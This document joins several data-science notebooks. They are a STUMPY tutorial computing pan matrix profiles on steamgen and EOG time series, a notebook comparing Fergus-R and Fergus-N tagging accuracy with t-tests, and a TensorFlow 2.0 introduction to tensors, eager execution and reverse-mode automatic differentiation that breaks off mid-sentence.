Notice how the pan matrix profile has become a bit clearer and a less "blocky"? Steamgen Example
###Code
steam_df = pd.read_csv("https://zenodo.org/record/4273921/files/STUMPY_Basics_steamgen.csv?download=1")
m = 640
mp = stumpy.stump(steam_df["steam flow"], m=m)
motif_idx = np.argmin(mp[:, 0])
nn_idx = mp[motif_idx, 1]
fig, axs = plt.subplots(2)
axs[0].plot(steam_df["steam flow"].values)
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[motif_idx : motif_idx + m])
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[nn_idx : nn_idx + m])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMP
###Code
min_m, max_m = 100, 3000
steam = stumpy.stimp(steam_df['steam flow'], min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
for _ in range(2 * n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Bonus Section
###Code
%matplotlib widget
plt.style.use('stumpy.mplstyle')
plt.ioff()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
plt.ion()
ax = plt.gca()
ax.format_coord = lambda x, y: f'Time = {x:.0f}, m = {y:.0f}'
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
def update_slider(change):
PAN = steam.pan(threshold=change['new'])
im.set_data(PAN)
fig.canvas.draw_idle()
threshold = 0.2
slider = widgets.FloatSlider(value=threshold, min=0.0, max=1.0, step=0.01, readout_format='.2f', layout=Layout(width='80%'), description='Threshold:')
slider.observe(update_slider, names='value')
widgets.VBox([fig.canvas, slider])
###Output
_____no_output_____
###Markdown
Finding and Visualizing Time Series Motifs of All Lengths using the Matrix Profile Import Some Packages
###Code
%matplotlib inline
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import cm
import ipywidgets as widgets
from ipywidgets import interact, Layout
import stumpy
plt.style.use('https://raw.githubusercontent.com/TDAmeritrade/stumpy/main/docs/stumpy.mplstyle')
###Output
_____no_output_____
###Markdown
EOG ExampleSee [Figure 1](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf)
###Code
eog_df = pd.read_csv("https://zenodo.org/record/4733142/files/eog.csv?download=1")
m_250 = 250
m_500 = 500
mp_250 = stumpy.stump(eog_df["EOG"], m=m_250)
mp_500 = stumpy.stump(eog_df["EOG"], m=m_500)
motif_idx_250 = np.argmin(mp_250[:, 0])
motif_idx_500 = np.argmin(mp_500[:, 0])
nn_idx_250 = mp_250[motif_idx_250, 1]
nn_idx_500 = mp_500[motif_idx_500, 1]
fig, axs = plt.subplots(3)
axs[0].plot(eog_df["EOG"].values)
axs[1].plot(np.arange(m_250), eog_df.iloc[motif_idx_250 : motif_idx_250 + m_250])
axs[1].plot(np.arange(m_250), eog_df.iloc[nn_idx_250 : nn_idx_250 + m_250])
axs[2].plot(np.arange(m_500), eog_df.iloc[motif_idx_500 : motif_idx_500 + m_500])
axs[2].plot(np.arange(m_500), eog_df.iloc[nn_idx_500 : nn_idx_500 + m_500])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMPEssentially, `stumpy.stimp` implements [Table 2](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf).
###Code
min_m, max_m = 100, 1000
eog = stumpy.stimp(eog_df["EOG"].values, min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
eog.update()
###Output
_____no_output_____
###Markdown
Above, we select a range of window sizes from `min_m = 3` to `max_m = 1000` and we arrange the windows in this range according to a breadth first order (this is done automatically by `stumpy.stimp` and see [slide 32](https://drive.google.com/file/d/1eT9oHOAKoi4oGkUX26V9aZIopov0Pxt5/view)) and/or [Section C](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf). The order of the window sizes to be processed can be found in `.M_` attribute:
###Code
eog.M_[:n]
###Output
_____no_output_____
###Markdown
Notice that we don't compute the matrix profiles (approximated using `stumpy.scrump` at 1% and with `pre-scrump` turned on) for all of the window sizes and, instead, we select only 1% of the window sizes (`percent_m = 0.01`) for this task. So, only a total of `n` matrix profiles were computed. Now, let's plot our pan matrix profile along with the locations of our motif pairs (vertical red lines):
###Code
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Now, we'll compute 2% more matrix profiles (for a total of 1% + 2% = 3%) for additional windows:
###Code
for _ in range(2 * n):
eog.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Notice how the pan matrix profile has become a bit clearer and a less "blocky"? Steamgen Example
###Code
steam_df = pd.read_csv("https://zenodo.org/record/4273921/files/STUMPY_Basics_steamgen.csv?download=1")
m = 640
mp = stumpy.stump(steam_df["steam flow"], m=m)
motif_idx = np.argmin(mp[:, 0])
nn_idx = mp[motif_idx, 1]
fig, axs = plt.subplots(2)
axs[0].plot(steam_df["steam flow"].values)
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[motif_idx : motif_idx + m])
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[nn_idx : nn_idx + m])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMP
###Code
min_m, max_m = 100, 3000
steam = stumpy.stimp(steam_df['steam flow'], min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
for _ in range(2 * n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Bonus Section
###Code
%matplotlib widget
plt.style.use('https://raw.githubusercontent.com/TDAmeritrade/stumpy/main/docs/stumpy.mplstyle')
plt.ioff()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
plt.ion()
ax = plt.gca()
ax.format_coord = lambda x, y: f'Time = {x:.0f}, m = {y:.0f}'
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
def update_slider(change):
PAN = steam.pan(threshold=change['new'])
im.set_data(PAN)
fig.canvas.draw_idle()
threshold = 0.2
slider = widgets.FloatSlider(value=threshold, min=0.0, max=1.0, step=0.01, readout_format='.2f', layout=Layout(width='80%'), description='Threshold:')
slider.observe(update_slider, names='value')
widgets.VBox([fig.canvas, slider])
###Output
_____no_output_____ |
ipython_notebooks/coling2016-classification-results.ipynb | ###Markdown
Classification resultsIn the following sections, each comparison is presented: Fergus-Recurrent vs Fergus-Neuralized Fergus-R Convolutional vs Fergus-N Convolutional> Question: is R better than N with convolutional embeddings? Fergus-R Token vs Fergus-N Token > Question: is R better than N with token embeddings? Fergus-R MInimal Token vs Fergus-N Minimal Token > Question: is R better than N with token embeddings?-------- Convolutional vs Token vs Minimal Token Embeddings-------- Fergus-R Convolutional vs Fergus-R Token>Question: are convolutions better in the R model? Fergus-N Convolutional vs Fergus-N Token > Question: are convolutions better in the N model?
###Code
from sqlitedict import SqliteDict
import sys
import os
import numpy as np
import pandas as pd
import scipy.stats
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set_style('whitegrid')
ROOT = '/home/cogniton/research/code/paper_repos/coling_2016'
sys.path.append(ROOT)
import fergus
"""
Stats parsing and comparsion functions
"""
def parse_stats(stats, version):
assert version == 'before_astar' or version == 'after_astar'
out = []
for datum_index, datum in sorted(stats.items()):
new_datum = {'datum_index': datum_index,
'time': datum['time'],
'length': datum['length'],
'version': version}
for stat_type, binary_data in datum[version].items():
new_datum[stat_type] = float(sum(binary_data))/len(binary_data)
out.append(new_datum)
return pd.DataFrame(out)
def load_data(db_name, tablename='tagged_data', root_path=''):
import os
db_name = os.path.join(root_path, db_name)
with SqliteDict(db_name, tablename=tablename) as db:
data = db.items()
print(len(data))
stats = {int(d):datum[-1] for d, datum in data}
return pd.concat([parse_stats(stats, 'before_astar'),
parse_stats(stats, 'after_astar')])
def ttest_rel(df1, df2, stat_name, data_version, ax=None):
df1 = df1[df1.version==data_version]
df2 = df2[df2.version==data_version]
shared_indices = set(df1.datum_index).intersection(df2.datum_index)
df1_subset = df1[df1.datum_index.isin(shared_indices)][stat_name]
df2_subset = df2[df2.datum_index.isin(shared_indices)][stat_name]
ttest = scipy.stats.ttest_rel(df1_subset, df2_subset)
return ttest, df1_subset, df2_subset
def pretty_compare(model1, model2, model1_name, model2_name,
embedding1_name, embedding2_name, data_version):
print("{}-{} vs {}-{} embeddings {}".format(model1_name,
embedding1_name,
model2_name,
embedding2_name,
data_version))
print("="*30)
stat_keys = [('correct', 'mean'), ('time', 'median')]
func_map = {'mean': lambda x: np.mean(x), 'median': lambda x: np.median(x)}
fig, axes = plt.subplots(len(stat_keys), 1, figsize=(10,15))
for i, (stat_type, stat_functype) in enumerate(stat_keys):
n_dash = (20-len(stat_type))//2
print("{:^20}".format("-"*n_dash+stat_type+"-"*n_dash))
(stat,
m1subset, m2subset) = ttest_rel(model1, model2, stat_type, data_version)
format1 = "{}-{}".format(model1_name, embedding1_name)
format2 = "{}-{}".format(model2_name, embedding2_name)
model1_stat = func_map[stat_functype](m1subset)
model2_stat = func_map[stat_functype](m2subset)
print("\t{:<30} = {:0.4f}".format("{} {}".format(format1,stat_functype),
model1_stat))
print("\t{:<30} = {:0.4f}".format("{} {}".format(format2,stat_functype),
model2_stat))
print("\t pvalue = {}".format(stat.pvalue))
print("{:^20}\n".format("-"*15))
axes[i].hist(m1subset, bins=30, color='blue', alpha=0.5,
label=format1)
axes[i].hist(m2subset, bins=30, color='red', alpha=0.5,
label=format2)
axes[i].set_xlabel(stat_type, size=14)
axes[i].legend(loc=2)
plt.tight_layout()
plt.subplots_adjust(top=0.95)
plt.suptitle(data_version, size=18)
data_root = os.path.join(fergus.ROOTPATH, '../data')
fr_conv = load_data('fergusr_convolutional_test.db', root_path=data_root)
fr_token = load_data('fergusr_token_test.db', root_path=data_root)
fr_mintoken = load_data('fergusr_minimaltoken_test.db', root_path=data_root)
fn_conv = load_data('fergusn_convolutional_test.db', root_path=data_root)
fn_token = load_data('fergusn_token_test.db', root_path=data_root)
fn_mintoken = load_data('fergusn_minimaltoken_test.db', root_path=data_root)
'''
this compares the recurrent vs the neuralized model
with convolutional embeddings
'''
pretty_compare(fr_conv, fn_conv, "Fergus-R", "Fergus-N",
"Convolutional", "Convolutional",
"before_astar")
pretty_compare(fr_conv, fn_conv, "Fergus-R", "Fergus-N",
"Convolutional", "Convolutional",
"after_astar")
'''
this compares the recurrent model vs the neuralized model
with token embeddings
'''
pretty_compare(fr_token, fn_token, "Fergus-R", "Fergus-N",
"Token", "Token", "before_astar")
pretty_compare(fr_token, fn_token, "Fergus-R", "Fergus-N",
"Token", "Token", "after_astar")
'''
this compares the recurrent model vs the neuralized model
with minimal token embeddings
'''
pretty_compare(fr_mintoken, fn_mintoken, "Fergus-R", "Fergus-N",
"Minimal Token", "Minimal Token", "before_astar")
pretty_compare(fr_mintoken, fn_mintoken, "Fergus-R", "Fergus-N",
"Minimal Token", "Minimal Token", "after_astar")
'''
this is comparing the recurrent model with each embedding type
'''
pretty_compare(fr_conv, fr_token, "Fergus-R", "Fergus-R",
"Convolutional", "Token", "before_astar")
pretty_compare(fr_conv, fr_token, "Fergus-R", "Fergus-R",
"Convolutional", "Token", "after_astar")
pretty_compare(fr_conv, fr_mintoken, "Fergus-R", "Fergus-R",
"Convolutional", "Minimal Token", "before_astar")
pretty_compare(fr_conv, fr_mintoken, "Fergus-R", "Fergus-R",
"Convolutional", "Minimal Token", "after_astar")
pretty_compare(fr_token, fr_mintoken, "Fergus-R", "Fergus-R",
"Token", "Minimal Token", "before_astar")
pretty_compare(fr_token, fr_mintoken, "Fergus-R", "Fergus-R",
"Token", "Minimal Token", "after_astar")
'''
this compares the neuralized model with convolutional or token embeddings
'''
pretty_compare(fn_conv, fn_token, "Fergus-N", "Fergus-N",
"Convolutional", "Token", "before_astar")
pretty_compare(fn_conv, fn_token, "Fergus-N", "Fergus-N",
"Convolutional", "Token", "after_astar")
pretty_compare(fn_conv, fn_mintoken, "Fergus-N", "Fergus-N",
"Convolutional", "Minimal Token", "before_astar")
pretty_compare(fn_conv, fn_mintoken, "Fergus-N", "Fergus-N",
"Convolutional", "Minimal Token", "after_astar")
pretty_compare(fn_token, fn_mintoken, "Fergus-N", "Fergus-N",
"Token", "Minimal Token", "before_astar")
pretty_compare(fn_token, fn_mintoken, "Fergus-N", "Fergus-N",
"Token", "Minimal Token", "after_astar")
###Output
Fergus-N-Convolutional vs Fergus-N-Token embeddings before_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5811
Fergus-N-Token mean = 0.6069
pvalue = 1.38815047814e-27
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Token median = 1.8054
pvalue = 1.51107029427e-96
---------------
Fergus-N-Convolutional vs Fergus-N-Token embeddings after_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5735
Fergus-N-Token mean = 0.5563
pvalue = 7.48773714641e-12
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Token median = 1.8054
pvalue = 1.51107029427e-96
---------------
Fergus-N-Convolutional vs Fergus-N-Minimal Token embeddings before_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5811
Fergus-N-Minimal Token mean = 0.5209
pvalue = 1.4282183734e-120
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Minimal Token median = 2.0236
pvalue = 1.11420165606e-33
---------------
Fergus-N-Convolutional vs Fergus-N-Minimal Token embeddings after_astar
==============================
------correct------
Fergus-N-Convolutional mean = 0.5735
Fergus-N-Minimal Token mean = 0.5418
pvalue = 4.7182012581e-38
---------------
--------time--------
Fergus-N-Convolutional median = 1.9790
Fergus-N-Minimal Token median = 2.0236
pvalue = 1.11420165606e-33
---------------
Fergus-N-Token vs Fergus-N-Minimal Token embeddings before_astar
==============================
------correct------
Fergus-N-Token mean = 0.6069
Fergus-N-Minimal Token mean = 0.5209
pvalue = 1.47657277542e-230
---------------
--------time--------
Fergus-N-Token median = 1.8054
Fergus-N-Minimal Token median = 2.0236
pvalue = 5.3095725502e-174
---------------
Fergus-N-Token vs Fergus-N-Minimal Token embeddings after_astar
==============================
------correct------
Fergus-N-Token mean = 0.5563
Fergus-N-Minimal Token mean = 0.5418
pvalue = 2.28499928272e-09
---------------
--------time--------
Fergus-N-Token median = 1.8054
Fergus-N-Minimal Token median = 2.0236
pvalue = 5.3095725502e-174
---------------
|
section_5/5-1.ipynb | ###Markdown
Working with Tensorflow 2.0[**TensorFlow**](https://www.tensorflow.org/) is an end-to-end open source platform for machine learning. It has a comprehensive, flexible ecosystem of tools, libraries, and community resources that lets researchers push the state-of-the-art in ML and developers can easily build and deploy ML-powered applications.TensorFlow library is a free and open-source software library for *dataflow programming* (models a program as a directed graph of the data flowing between operations, thus implementing dataflow principles and architecture) and *differentiable programming* (programs can be differentiated throughout, usually via automatic differentiation. This allows for gradient based optimization of parameters in the program, often via gradient descent) across a range of tasks. It is a symbolic math library, and is also used for machine learning applications such as neural networks. It is used for both research and production at Google.TensorFlow was originally developed by researchers and engineers working on the Google Brain team within Google's Machine Intelligence Research organization to conduct machine learning and deep neural networks research. The system is general enough to be applicable in a wide variety of other domains, as well. It is one of the most popular libaries for machine learning with neural networks.TensorFlow provides stable Python and C++ APIs, as well as non-guaranteed backward compatible API for other languages. Tensorflow tensorsA [tensor](https://www.tensorflow.org/guide/tensor) is a generalization of vectors and matrices to potentially higher dimensions. Internally, TensorFlow represents tensors as n-dimensional arrays of base datatypes (similar to `numpy.ndarray`).When we write a TensorFlow program, we mainly operate and pass around `tf.Tensor` objects, which represents a partially defined data object that will eventually produce a value. In a Tensorflow program, we specify how these `tf.Tensor`'s link into a computation graph. We can then run the computation graph to get the output (based on an input), and use differential properties of the graph to optomise for parameter (`tf.Tensor` nodes) in the program. `tf.Tensor`'s can reside in GPU or CPU memory. Tensorflow supports a rich library of operations (`tf.add`, `tf.matmul`, `tf.linalg.inv` etc) that consume and produce `tf.Tensors`'s. These operations also automatically convert to native Python types too.
###Code
import tensorflow as tf
print("TensorFlow version : {}\n\n".format(tf.__version__))
print(tf.add(1, 3))
print(tf.add([2, 3], [6, 6]))
print(tf.square(2))
print(tf.reduce_sum([4, 3, 2]))
# Operator overloading is also supported
print(tf.square(3) + tf.square(2))
###Output
TensorFlow version : 2.1.0
tf.Tensor(4, shape=(), dtype=int32)
tf.Tensor([8 9], shape=(2,), dtype=int32)
tf.Tensor(4, shape=(), dtype=int32)
tf.Tensor(9, shape=(), dtype=int32)
tf.Tensor(13, shape=(), dtype=int32)
###Markdown
Each `tf.Tensor` has a datatype and a shape
###Code
x = tf.constant([[4, 3]])
print(x)
print(x.shape)
print(x.dtype)
###Output
tf.Tensor([[4 3]], shape=(1, 2), dtype=int32)
(1, 2)
<dtype: 'int32'>
###Markdown
Tensors differ from numpy arrays as they are *immutable*, can be computed and stored in the GPU or CPU.However it easy to convert from a `tf.Tensor` to a `np.ndarray`. Tensorflow automatically converts numpy arrays to `tf.Tensors`.
###Code
ndarray = np.array([[1, 2], [3, 4]])
# Tensorflow converts ndarray to a tensor after an operation
tensor = tf.multiply(ndarray, 2)
print('Tensor :\n', tensor)
# Tensorflow converts ndarray to a tensor after operator overloading operation
tensor = tf.constant(2) * ndarray
print('\nTensor :\n', tensor)
# Numpy can convert a tensor to a numpy ndarray
numpy_array = np.multiply(tensor, 2)
print('\nNumpy ndarray :\n', numpy_array)
# It does this by calling the .numpy() method explicity
print('\nNumpy ndarray : \n', tensor.numpy())
###Output
Tensor :
tf.Tensor(
[[2 4]
[6 8]], shape=(2, 2), dtype=int64)
Tensor :
tf.Tensor(
[[2 4]
[6 8]], shape=(2, 2), dtype=int32)
Numpy ndarray :
[[ 4 8]
[12 16]]
Numpy ndarray :
[[2 4]
[6 8]]
###Markdown
We can also index tensors with the same convention as numpy.
###Code
print(tensor[0, 0])
print('\n', tensor[:, 1])
###Output
tf.Tensor(2, shape=(), dtype=int32)
tf.Tensor([4 8], shape=(2,), dtype=int32)
###Markdown
Tensorflow operations can be accelerated by parralelised to be computed on a GPU. By default, Tensorflow automatically decides whether to use the GPU or CPU for an operation (copying the memory between them if necessary).
###Code
x = tf.random.uniform([4, 4])
print("List if there is a GPU available : ",
tf.config.experimental.list_physical_devices("GPU"))
print("\nIs the Tensor on GPU #0: ", x.device.endswith('GPU:0'))
###Output
List if there is a GPU available : []
Is the Tensor on GPU #0: False
###Markdown
The `tf.Tensor` has the same data type `tf.Dtype` (e.g. {`int32`, `float32`, `string`}) for each element. There are some special types of tensors, such as `tf.Variable`, `tf.constant`, `tf.SparseTensor`, `tf.placeholder`. The data of a tensor is immutable, meaning that in a single run of the graph the data doesn't change.Depending on the dimension of the tensor, we get the following|Dimension|Classical mathematical form||---|---|| 0 | Scalar || 1 | Vector || 2 | Matrix || 3 | 3-Tensor || n | n-Tensor |A variable, i.e. `tf.Variable` is the best way to represent shared state, and the value can be changed by running operations on it. Higher level libraries like `keras` use `tf.Variable`'s to store model parameters.
###Code
zeros = tf.Variable(tf.zeros([2, 3]))
print(zeros)
scalar = tf.Variable(5)
print('\n', scalar)
# To assign a value to an already set variable we use the .assign() method
scalar.assign(4)
print('\n', scalar)
# We can also explicitly read a value using the .read_value() method
print('\n', scalar.read_value())
###Output
<tf.Variable 'Variable:0' shape=(2, 3) dtype=float32, numpy=
array([[0., 0., 0.],
[0., 0., 0.]], dtype=float32)>
<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=5>
<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=4>
tf.Tensor(4, shape=(), dtype=int32)
###Markdown
Eager executionA very useful feature in tensorflow 2.0, enabled by default is *eager execution*, which is an imperative programming enviroment that evaluates operations immediately, without building graphs: operations return definitive values rather than constructing a computational graph to run later. This makes it easy to start working with Tensorflow and debug models. This allows use of Pythons data structures, flexibility how we can structure our code and using Python control flow as well. This supports GPU operations as well.
###Code
print('Tensorflow {}, executing early by default\nAre we evaluating operations immediately ? : {}'.format(
tf.__version__, tf.executing_eagerly()))
# When we run Tensorflow operations the result is immediately returned
x = tf.constant(2, name='x')
y = tf.constant(3, name='y')
z = x * y
print('z = {}\n As'.format(z))
print('z = {} = x ({}) * y ({})'.format(z, x, y))
# Visualise the computation graph
# The function to be traced.
@tf.function
def my_func(x, y):
# A simple hand-rolled layer.
return x*y
# Set up logging.
stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
logdir = 'logs/func/%s' % stamp
writer = tf.summary.create_file_writer(logdir)
# Sample data for your function.
x = tf.constant(2, name='x')
y = tf.constant(3, name='y')
# Bracket the function call with
# tf.summary.trace_on() and tf.summary.trace_export().
tf.summary.trace_on(graph=True, profiler=True)
# Call only one tf.function when tracing.
z = my_func(x, y)
with writer.as_default():
tf.summary.trace_export(
name="my_func_trace",
step=0,
profiler_outdir=logdir)
print('z = {} = x ({}) * y ({})'.format(z, x, y))
%tensorboard --logdir logs/func
###Output
z = 6 = x (2) * y (3)
###Markdown
Automatic differentiation[Automatic differentiation](https://www.wikiwand.com/en/Automatic_differentiation) (AD) is a set of techniques to numerically evaluate the derivative of a function specified by a computer program. AD exploits the fact that every computer program, no matter how complicated, executes a sequence of elementary arithmetic operations (addition, subtraction, multiplication, division, etc.) and elementary functions (exp, log, sin, cos, etc.). By applying the chain rule repeatedly to these operations, derivatives of arbitrary order can be computed automatically, accurately to working precision, and using at most a small constant factor more arithmetic operations than the original program. The chain rule, forward and reverse accumulationFundamental to AD is the decomposition of differentials provided by the chain rule. For the simple composition $$\begin{align}y &= f(g(h(x))) = f(g(h(w_0))) = f(g(w_1)) = f(w_2) = w_3 \\w_0 &= x \\ w_1 &= h(w_0) \\w_2 &= g(w_1) \\w_3 &= f(w_2) = y\end{align}$$the chain rule gives$$\frac{dy}{dx} = \frac{dy}{dw_2} \frac{dw_2}{dw_1} \frac{dw_1}{dx}$$Usually, two distinct modes of AD are presented, *forward accumulation* (or *forward mode*) and *reverse accumulation* (or *reverse mode*). Forward accumulation specifies that one traverses the chain rule from inside to outside (that is, first compute $dw_1/dx$ and then $dw_2/dw_1$ and at last $dy/dw_2$), while reverse accumulation has the traversal from outside to inside (first compute $dy/dw_2$ and then $dw_2/dw_1$ and at last $dw_1/dx$). More succinctly,1. *forward accumulation* computes the recursive relation: $\frac{dw_i}{dx} = \frac{dw_i}{dw_{i-1}} \frac{dw_{i-1}}{dx}$ with $w_3 = y$, and,2. *reverse accumulation* computes the recursive relation: $\frac{dy}{dw_i} = \frac{dy}{dw_{i+1}} \frac{dw_{i+1}}{dw_{i}}$ with $w_0 = x$.Generally, both forward and reverse accumulation are specific manifestations of applying the operator of program composition, fixing the appropriate one of the two mappings $(w,y)$. Tensorflow uses *reverse accumulation*. Reverse accumulationIn reverse accumulation AD, the *dependent variable* to be differentiated is fixed and the derivative is computed *with respect to* each sub-expression recursively. In a pen-and-paper calculation, the derivative of the *outer* functions is repeatedly substituted in the chain rule:$$\frac{\partial y}{\partial x}= \frac{\partial y}{\partial w_1} \frac{\partial w_1}{\partial x}= \left(\frac{\partial y}{\partial w_2} \frac{\partial w_2}{\partial w_1}\right) \frac{\partial w_1}{\partial x}= \left(\left(\frac{\partial y}{\partial w_3} \frac{\partial w_3}{\partial w_2}\right) \frac{\partial w_2}{\partial w_1}\right) \frac{\partial w_1}{\partial x}= \cdots$$In reverse accumulation, the quantity of interest is the *adjoint*, denoted with a bar ($w̄$); it is a derivative of a chosen dependent variable with respect to a subexpression $w$:$\bar w = \frac{\partial y}{\partial w}$[[2](https://en.wikipedia.org/wiki/File:ForwardAccumulationAutomaticDifferentiation.png)]Reverse accumulation traverses the chain rule from outside to inside, or in the case of the computational graph in the diagram, from top to bottom. The example function is scalar-valued, and thus there is only one seed for the derivative computation, and only one sweep of the computational graph is needed to calculate the (two-component) gradient.This is only half the work when compared to forward accumulation, but reverse accumulation requires the storage of the intermediate variables $w-i$ as well as the instructions that produced them in a data structure known as a Wengert list (or "tape") which may consume significant memory if the computational graph is large.This can be mitigated to some extent by storing only a subset of the intermediate variables and then reconstructing the necessary work variables by repeating the evaluations, a technique known as rematerialization. Checkpointing is also used to save intermediary states (Tensorflow supports checkpointing).The operations to compute the derivative using reverse accumulation are shown in the table below (note the reversed order):$$\begin{array}{l}\text{Operations to compute derivative}\\ \hline\bar w_5 = 1 \text{ (seed)}\\\bar w_4 = \bar w_5\\\bar w_3 = \bar w_5\\\bar w_2 = \bar w_3 \cdot w_1\\\bar w_1 = \bar w_3 \cdot w_2 + \bar w_4 \cdot \cos w_1\end{array}$$The data flow graph of a computation can be manipulated to calculate the gradient of its original calculation. This is done by adding an adjoint node for each primal node, connected by adjoint edges which parallel the primal edges but flow in the opposite direction. The nodes in the adjoint graph represent multiplication by the derivatives of the functions calculated by the nodes in the primal. For instance, addition in the primal causes fanout in the adjoint; fanout in the primal causes addition in the adjoint; In terms of weight matrices, the adjoint is the transpose. Addition is the covector $[1 \cdots 1]$, since $[1 \cdots 1]\left[\begin{smallmatrix}x_1 \\ \vdots \\ x_n \end{smallmatrix}\right] = x_1 + \cdots + x_n,$ and fanout is the vector $\left[\begin{smallmatrix}1 \\ \vdots \\ 1 \end{smallmatrix}\right],$ since $\left[\begin{smallmatrix}1 \\ \vdots \\ 1 \end{smallmatrix}\right][x] = \left[\begin{smallmatrix}x \\ \vdots \\ x \end{smallmatrix}\right].$ a unary function $y=f(x)$ in the primal causes $x̄=ȳf′(x)$ in the adjoint; etc.Reverse accumulation is more efficient than forward accumulation for functions $f : ℝ^{n} → ℝ^{m}$ with $m ≪ n$ as only $m$ sweeps are necessary, compared to $n$ sweeps for forward 